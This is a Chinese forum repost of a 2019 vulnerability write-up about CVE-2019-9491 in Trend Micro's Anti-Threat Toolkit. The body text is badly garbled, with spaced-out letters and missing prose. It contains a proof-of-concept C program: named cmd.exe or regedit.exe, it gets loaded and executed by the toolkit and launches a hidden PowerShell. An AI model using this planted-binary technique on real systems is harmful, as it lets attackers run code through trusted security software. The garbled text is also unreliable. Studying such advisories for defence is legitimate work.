搜索

[79] 2019-10-27_趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-15
2019-10-27_趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语 A d m i n   T e a m   2 0 1 9 - 1 0 - 2 7   A T T K C V E - 2 0 1 9 - 9 4 9 1 W i n d o w s A T T K M O T W A T T K [ E x p l o i t / P O C ] C o m p i l e   a n   . E X E   u s i n g   b e l o w   " C "   c o d e   a n d   u s e   n a m i n g   c o n v e n t i o n   o f   " c m d . e x e "   o r   " r e g e d i t . e x e " . R u n   t h e   A n t i - T h r e a t   T o o l k i t   a n d   w a t c h   t h e   A T T K   c o n s o l e   t o   s e e   t h e   T r o j a n   f i l e   g e t   l o a d e d   a n d   e x e c u t e d . c m d . e x e r e g e d i t . e x e A T T K # i n c l u d e   < w i n d o w s . h > v o i d   m a i n ( v o i d ) {       p u t s ( " T r e n d   M i c r o   A n t i - T h r e a t   T o o l k i t   P W N E D ! " ) ;       p u t s ( " D i s c o v e r y :   h y p 3 r l i n x " ) ;       p u t s ( " C V E - 2 0 1 9 - 9 4 9 1 n " ) ;   .
      W i n E x e c ( " p o w e r s h e l l " ,   0 ) ; } P O C h t t p : / / h y p 3 r l i n x . a l t e r v i s t a . o r g / a d v i s o r i e s / T R E N D - M I C R O - A N T I - T H R E A T - T O O L K I T - ( A T T K ) - R E M O T E - C O D E - E X E C U T I O N . t x t c m d . e x e r e g e d i t . e x e ( ) 便 0 d a y h t t p : / / h y p 3 r l i n x . a l t e r v i s t a . o r g / a t t k _ c o l l e c t o r _ c l i _ x 6 4 . e x e H a s h :   e 8 5 0 3 e 9 8 9 7 f d 5 6 e a c 0 c e 3 c 3 f 6 d b 2 4 f b 1 T r e n d M i c r o R a n s o m w a r e C o l l e c t o r 6 4 . r 0 9 . e x e H a s h :   7 9 8 0 3 9 0 2 7 b b 4 3 6 3 d c f d 2 6 4 c 1 4 2 6 7 3 7 5 f a t t k _ S c a n C l e a n O n l i n e _ g u i _ x 6 4 . e x e H a s h :   f 1 d 2 c a 4 b 1 4 3 6 8 9 1 1 c 7 6 7 8 7 3 c d b c 1 9 4 e d

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理